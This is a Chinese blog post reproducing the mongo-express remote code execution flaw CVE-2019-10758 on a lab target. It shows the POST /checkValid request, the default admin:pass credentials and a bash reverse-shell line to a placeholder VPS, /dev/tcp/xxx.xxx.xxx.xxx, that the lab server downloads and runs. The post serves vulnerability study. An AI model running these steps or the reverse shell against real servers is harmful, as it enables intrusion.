mongo-express 代码执行 (cve-2019-10758)

最新推荐文章于 2024-01-25 08:58:32 发布
最新推荐文章于 2024-01-25 08:58:32 发布
阅读量1.1k 收藏 1
点赞数
文章标签: mongodb 前端 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48817799/article/details/122227699
版权

CVE-2019-10758

前言

名称: mongo-express 代码执行 (cve-2019-10758)
描述: mongo-express是一款mongodb的第三方Web界面,使用node和express开发。如果攻击者可以成功登录,或者目标服务器没有修改默认的账号密码(admin:pass),则可以执行任意node.js代码。

一、复现过程

1.老样子,fofa靶场http://vulfocus.fofa.so
信息提示如下
12.页面如下
在这里插入图片描述3.万物皆抓包
在这里插入图片描述4.进入主题,在burp进行三地构造

一地:post 提交

POST /checkValid HTTP/1.1

二地:添加请求头

Content-Type: application/x-www-form-urlencoded

三地:从vps下载shell.txt 文件到web本地
shell.txt

bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/IP 0>&1

注:Invalid:失败 Valid:成功
在这里插入图片描述5.根据回显可知目标已从vps下载shell.txt已经输入到/tmp/shell中,这时开启vps监听,并运行tmp/shell文件
开启监听
在这里插入图片描述
运行shell文件
在这里插入图片描述反shell结果
在这里插入图片描述

总结

影响版本:
mongo-express 0.53.0

前提条件:
知道Mongo的账号密码,或者未授权

方九夜
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
mongo-express:基于Web的MongoDB管理界面,使用Node.js编写并表达
02-03
mongo-express 使用Node.js,Express和Bootstrap3编写的基于Web的MongoDB管理界面 产品特点 连接到多个数据库 查看/添加/删除数据库 查看/添加/重命名/删除收藏集 查看/添加/更新/删除文档 在集合视图中内联预览音频/视频/图像资产 嵌套和/或大对象可折叠,以方便查看 异步按需加载大文档属性(默认值> 100KB),以保持快速收集视图 GridFS支持-添加/获取/删除非常大的文件 在文档中使用BSON数据类型 移动/响应式-当您处于绑定状态时,Bootstrap 3可以在小屏幕上正常运行 连接并验证各个数据库 以管理员身份验证以查看所有数据库 数据库黑名单/白名单 自定义CA和CA验证禁用 支持副本集 屏幕截图 主页 数据库视图 集合视图 编辑文件 这些屏幕截图来自版本0.30.40的“查看相册”以获取更多屏幕截图:(服务器状态,数据库视图等。) 发展历程 将config.default.js复制到config.js并编辑默认属性以适合您的本地环境 使用以下命令运行开发版本: npm run start-dev 用法(npm /
mongo-express远程代码执行(CVE-2019-10758)漏洞复现(msfvenom/wget,反弹shell)
negnegil的博客
09-07 3843
mongo-express mongo-express是一个MongoDB的Admin Web管理界面,基于NodeJS、Express、Bootstrap3开源编写 漏洞介绍 在开启了端口8081后,攻击者可以直接访问,而目标服务器上没有修改默认的登录密码admin/pass,则攻击者可以远程执行node.js代码 复现环境 mongo-express 0.53.0 MongoDB Version 3.4.24 漏洞环境搭建 采用github开源docker漏洞环境搭建而成 项目地址: https:/
Mongo-Express RCE(CVE-2019-10758)复现排查
dayouzi的博客
08-14 801
Mongo-express是的管理工具,类似Navicat对应Mysql的关系,其使用Node.js,Express和Bootstrap3编写的基于Web的MongoDB图形化管理界面。漏洞问题出在lib/bson.js中的toBSON()函数中,路由 /checkValid 从外部接收输入,并调用了存在 RCE 漏洞的代码,由此存在被攻击的风险。
mongo-express 远程代码执行漏洞(CVE-2019-10758
qq_50854662的博客
03-01 752
前言 mongo-express是一款mongodb的第三方Web界面,使用node和express开发。如果攻击者可以成功登录,或者目标服务器没有修改默认的账号密码(admin:pass),则可以执行任意node.js代码。 影响版本 mongo-express, 0.54.0 之前的版本 环境搭建 cd vulhub/mongo-express/CVE-2019-10758 docker-compose up -d 环境启动后,访问http://y...
mongo-express 代码执行 (cve-2019-10758)
qq_51459600的博客
12-24 815
1.环境搭建 项目地址: vulhub/mongo-express/CVE-2019-10758 at master · vulhub/vulhub (github.com) 拉取项目: git clone https://github.com.cnpmjs.org/vulhub/vulhub.git [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-m0qN0Cum-1640341732202)(https://cdn.jsdelivr.net/gh/QJLONG/HUMME
mongo-express-mongodb-k8s:Kubernetes配置文件,用于部署与mongodb容器通信的mongo-express容器
03-25
MongoDB是目前非常流行的一款开源、高性能、无模式的文档型数据库,而Mongo-Express则是一个基于Web的MongoDB管理界面,它使得管理和操作MongoDB数据库变得更加直观和方便。在Kubernetes(K8s)这样的容器编排系统中...
mongo-express-node-generator:mongo-express-node代码生成器
03-16
Mongo-express-node-generator 是一个基于 JavaScript 的工具,用于自动生成 MongoDBExpress 和 Node.js 应用的基础架构。这个工具能够帮助开发者快速搭建后端服务,从而节省手动编写基础框架的时间,提高开发效率...
Node.js-mongo-express-基于Web的MongoDB管理界面采用Node.js和express开发
08-10
标题中的“Node.js-mongo-express-基于Web的MongoDB管理界面采用Node.js和express开发”揭示了我们讨论的主题:一个使用Node.js和Express框架构建的MongoDB Web管理界面,名为“mongo-express”。这个工具提供了图形...
mongo-sync:同步远程和本地MongoDB数据库
02-02
`mongo-sync`就是这样一个工具,它允许我们方便地实现这个目标。 `mongo-sync`是一个基于Shell脚本的解决方案,它简化了在多个MongoDB实例之间同步数据的过程。通过使用这个工具,开发者可以快速地将远程数据库的...
express的使用(五) 简单的使用mongodb
胡世林的博客
06-18 1800
express中使用mongodb的简单例子
MongoDB数据库管理工具mongo-express
北辰
09-20 855
mongo-express是一款用node.js开发的基于Web的MongoDB数据库管理工具。
Express操作MongoDB
m0_74331185的博客
11-30 732
Express操作MongoDB
一、MongoDBexpress的安装和基本使用
最新发布
meteorites的博客
01-25 1682
MongoDBMongoDB Compass安装和使用; nodeJs+express+Vue+MongoDB
前后端交互(三)| MongoDB+Express | (3)Express框架
Better_Xing的博客
10-19 1110
Express框架 文章目录Express框架1. Express框架简介及初体验1.1 Express框架是什么1.2 Express框架特性1.3 原生Node.js与Express框架对比:路由和获取请求参数1.4 Express初体验2. 中间件2.1 什么是中间件2.2 app.use中间件用法2.3 中间件应用2.4 错误处理中间件2.5 捕获错误3. Express请求处理3.1 构建模块化路由3.2 GET参数的获取3.3 POST参数的获取3.4 Express路由参数3.5 静态资源的
MacOS上用docker运行mongomongo-express
xst_3300
08-03 1272
MongoDB 是一个基于分布式文件存储的数据库。由 C++ 语言编写。旨在为 WEB 应用提供可扩展的高性能数据存储解决方案。MongoDB 是一个介于关系数据库和非关系数据库之间的产品,是非关系数据库当中功能最丰富,最像关系数据库的。
使用express连接MongoDB数据库编写基础的增、删、改、查、分页接口
weixin_39893889的博客
09-20 2551
使用express编写基础的增、删、改、查、分页接口
mongodb数据库基础操作~Express操作MongoDB
m0_73849466的博客
11-30 723
mongodb数据库基础操作(增删改查)~Express操作MongoDB
docker 部署mongo-express
不积跬步,无以至千里;不积小流,无以成江海。
11-21 725
docker 部署mongo-express
Express框架访问MongoDB数据库
Bloomberg_Alex的博客
12-01 663
Express框架访问MongoDB数据库
mongo --out
08-10
- *1* [Java操作MongoDB使用mongo-java-driver](https://blog.csdn.net/jinxilongjxl/article/details/108734824)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值